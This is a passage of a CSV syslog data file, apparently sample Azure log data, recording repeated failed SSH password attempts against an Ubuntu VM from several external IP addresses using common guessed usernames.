+4472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:48,UbuntuDevEnv,2019-06-26 14:30:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:50,UbuntuDevEnv,2019-06-26 14:30:49,auth,UbuntuDevEnv,info,Failed password for invalid user dui from 196.46.36.144 port 42410 ssh2,9466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dui,196.46.36.1,42410,,
+4474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:50,UbuntuDevEnv,2019-06-26 14:30:50,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 42410:11: Bye Bye [preauth],9466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,42410,,
+4475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:50,UbuntuDevEnv,2019-06-26 14:30:50,auth,UbuntuDevEnv,info,Disconnected from invalid user dui 196.46.36.144 port 42410 [preauth],9466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dui,196.46.36.1,42410,,
+4476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:31:27,UbuntuDevEnv,2019-06-26 14:31:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219  user=messagebus,9608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,messagebus,164.132.192.2,,0,
+4477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:31:29,UbuntuDevEnv,2019-06-26 14:31:28,auth,UbuntuDevEnv,info,Failed password for messagebus from 164.132.192.219 port 53602 ssh2,9608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,53602,,
+4478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:31:29,UbuntuDevEnv,2019-06-26 14:31:28,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 53602:11: Bye Bye [preauth],9608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,53602,,
+4479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:31:29,UbuntuDevEnv,2019-06-26 14:31:28,auth,UbuntuDevEnv,info,Disconnected from authenticating user messagebus 164.132.192.219 port 53602 [preauth],9608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,messagebus,164.132.192.2,53602,,
+4480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:31:47,UbuntuDevEnv,2019-06-26 14:31:47,auth,UbuntuDevEnv,info,Invalid user smbuser from 68.183.50.149 port 39526,9685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smbuser,68.183.50.1,39526,,
+4481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:31:47,UbuntuDevEnv,2019-06-26 14:31:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:31:47,UbuntuDevEnv,2019-06-26 14:31:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,9685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:31:50,UbuntuDevEnv,2019-06-26 14:31:49,auth,UbuntuDevEnv,info,Failed password for invalid user smbuser from 68.183.50.149 port 39526 ssh2,9685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smbuser,68.183.50.1,39526,,
+4484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:31:50,UbuntuDevEnv,2019-06-26 14:31:49,auth,UbuntuDevEnv,info,Disconnected from invalid user smbuser 68.183.50.149 port 39526 [preauth],9685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smbuser,68.183.50.1,39526,,
+4485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:31:50,UbuntuDevEnv,2019-06-26 14:31:49,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 39526:11: Bye Bye [preauth],9685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,39526,,
+4486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:32:06,UbuntuDevEnv,2019-06-26 14:32:05,auth,UbuntuDevEnv,info,Invalid user demo from 220.134.138.111 port 36910,9746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,220.134.138.1,36910,,
+4487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:32:06,UbuntuDevEnv,2019-06-26 14:32:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,9746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:32:06,UbuntuDevEnv,2019-06-26 14:32:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:32:07,UbuntuDevEnv,2019-06-26 14:32:07,auth,UbuntuDevEnv,info,Failed password for invalid user demo from 220.134.138.111 port 36910 ssh2,9746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,220.134.138.1,36910,,
+4490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:32:07,UbuntuDevEnv,2019-06-26 14:32:07,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 36910:11: Bye Bye [preauth],9746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,36910,,
+4491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:32:07,UbuntuDevEnv,2019-06-26 14:32:07,auth,UbuntuDevEnv,info,Disconnected from invalid user demo 220.134.138.111 port 36910 [preauth],9746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,220.134.138.1,36910,,
+4492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:17,UbuntuDevEnv,2019-06-26 14:33:17,auth,UbuntuDevEnv,info,Invalid user g from 164.132.192.219 port 35319,10017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,g,164.132.192.2,35319,,
+4493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:17,UbuntuDevEnv,2019-06-26 14:33:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:17,UbuntuDevEnv,2019-06-26 14:33:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,10017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:18,UbuntuDevEnv,2019-06-26 14:33:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144  user=test,10013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,196.46.36.1,,0,
+4496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:19,UbuntuDevEnv,2019-06-26 14:33:18,auth,UbuntuDevEnv,info,Invalid user vps from 68.183.50.149 port 56488,10021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,68.183.50.1,56488,,
+4497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:19,UbuntuDevEnv,2019-06-26 14:33:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:19,UbuntuDevEnv,2019-06-26 14:33:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,10021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:20,UbuntuDevEnv,2019-06-26 14:33:19,auth,UbuntuDevEnv,info,Failed password for invalid user g from 164.132.192.219 port 35319 ssh2,10017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,g,164.132.192.2,35319,,
+4500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:20,UbuntuDevEnv,2019-06-26 14:33:19,auth,UbuntuDevEnv,info,Disconnected from invalid user g 164.132.192.219 port 35319 [preauth],10017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,g,164.132.192.2,35319,,
+4501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:20,UbuntuDevEnv,2019-06-26 14:33:19,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 35319:11: Bye Bye [preauth],10017,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,35319,,
+4502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:20,UbuntuDevEnv,2019-06-26 14:33:20,auth,UbuntuDevEnv,info,Failed password for test from 196.46.36.144 port 50577 ssh2,10013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,50577,,
+4503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:20,UbuntuDevEnv,2019-06-26 14:33:20,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 50577:11: Bye Bye [preauth],10013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,50577,,
+4504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:20,UbuntuDevEnv,2019-06-26 14:33:20,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 196.46.36.144 port 50577 [preauth],10013,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,196.46.36.1,50577,,
+4505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:21,UbuntuDevEnv,2019-06-26 14:33:20,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 68.183.50.149 port 56488 ssh2,10021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,68.183.50.1,56488,,
+4506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:21,UbuntuDevEnv,2019-06-26 14:33:20,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 68.183.50.149 port 56488 [preauth],10021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,68.183.50.1,56488,,
+4507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:21,UbuntuDevEnv,2019-06-26 14:33:20,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 56488:11: Bye Bye [preauth],10021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,56488,,
+4508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:57,UbuntuDevEnv,2019-06-26 14:33:56,auth,UbuntuDevEnv,info,Invalid user miguel from 220.134.138.111 port 54014,10150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miguel,220.134.138.1,54014,,
+4509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:57,UbuntuDevEnv,2019-06-26 14:33:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,10150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:57,UbuntuDevEnv,2019-06-26 14:33:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:59,UbuntuDevEnv,2019-06-26 14:33:58,auth,UbuntuDevEnv,info,Failed password for invalid user miguel from 220.134.138.111 port 54014 ssh2,10150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miguel,220.134.138.1,54014,,
+4512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:59,UbuntuDevEnv,2019-06-26 14:33:59,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 54014:11: Bye Bye [preauth],10150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,54014,,
+4513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:33:59,UbuntuDevEnv,2019-06-26 14:33:59,auth,UbuntuDevEnv,info,Disconnected from invalid user miguel 220.134.138.111 port 54014 [preauth],10150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miguel,220.134.138.1,54014,,
+4514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:22,UbuntuDevEnv,2019-06-26 14:34:22,auth,UbuntuDevEnv,info,Invalid user debian from 221.160.100.14 port 38354,10246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debian,221.160.100.1,38354,,
+4515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:22,UbuntuDevEnv,2019-06-26 14:34:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=221.160.100.14,10246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,221.160.100.1,,0,
+4516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:22,UbuntuDevEnv,2019-06-26 14:34:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:24,UbuntuDevEnv,2019-06-26 14:34:24,auth,UbuntuDevEnv,info,Failed password for invalid user debian from 221.160.100.14 port 38354 ssh2,10246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debian,221.160.100.1,38354,,
+4518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:25,UbuntuDevEnv,2019-06-26 14:34:24,auth,UbuntuDevEnv,info,Disconnected from invalid user debian 221.160.100.14 port 38354 [preauth],10246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debian,221.160.100.1,38354,,
+4519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:25,UbuntuDevEnv,2019-06-26 14:34:24,auth,UbuntuDevEnv,info,"Received disconnect from 221.160.100.14 port 38354:11: Normal Shutdown, Thank you for playing [preauth]",10246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,221.160.100.1,38354,,
+4520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:51,UbuntuDevEnv,2019-06-26 14:34:50,auth,UbuntuDevEnv,info,Invalid user siverko from 164.132.192.219 port 43880,10351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,siverko,164.132.192.2,43880,,
+4521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:51,UbuntuDevEnv,2019-06-26 14:34:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:51,UbuntuDevEnv,2019-06-26 14:34:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,10351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:53,UbuntuDevEnv,2019-06-26 14:34:53,auth,UbuntuDevEnv,info,Failed password for invalid user siverko from 164.132.192.219 port 43880 ssh2,10351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,siverko,164.132.192.2,43880,,
+4524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:53,UbuntuDevEnv,2019-06-26 14:34:53,auth,UbuntuDevEnv,info,Disconnected from invalid user siverko 164.132.192.219 port 43880 [preauth],10351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,siverko,164.132.192.2,43880,,
+4525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:53,UbuntuDevEnv,2019-06-26 14:34:53,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 43880:11: Bye Bye [preauth],10351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,43880,,
+4526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:54,UbuntuDevEnv,2019-06-26 14:34:54,auth,UbuntuDevEnv,info,Invalid user admin from 68.183.50.149 port 45208,10359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,68.183.50.1,45208,,
+4527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:54,UbuntuDevEnv,2019-06-26 14:34:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,10359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:54,UbuntuDevEnv,2019-06-26 14:34:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:56,UbuntuDevEnv,2019-06-26 14:34:55,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 68.183.50.149 port 45208 ssh2,10359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,68.183.50.1,45208,,
+4530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:56,UbuntuDevEnv,2019-06-26 14:34:55,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 45208:11: Bye Bye [preauth],10359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,45208,,
+4531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:34:56,UbuntuDevEnv,2019-06-26 14:34:55,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 68.183.50.149 port 45208 [preauth],10359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,68.183.50.1,45208,,
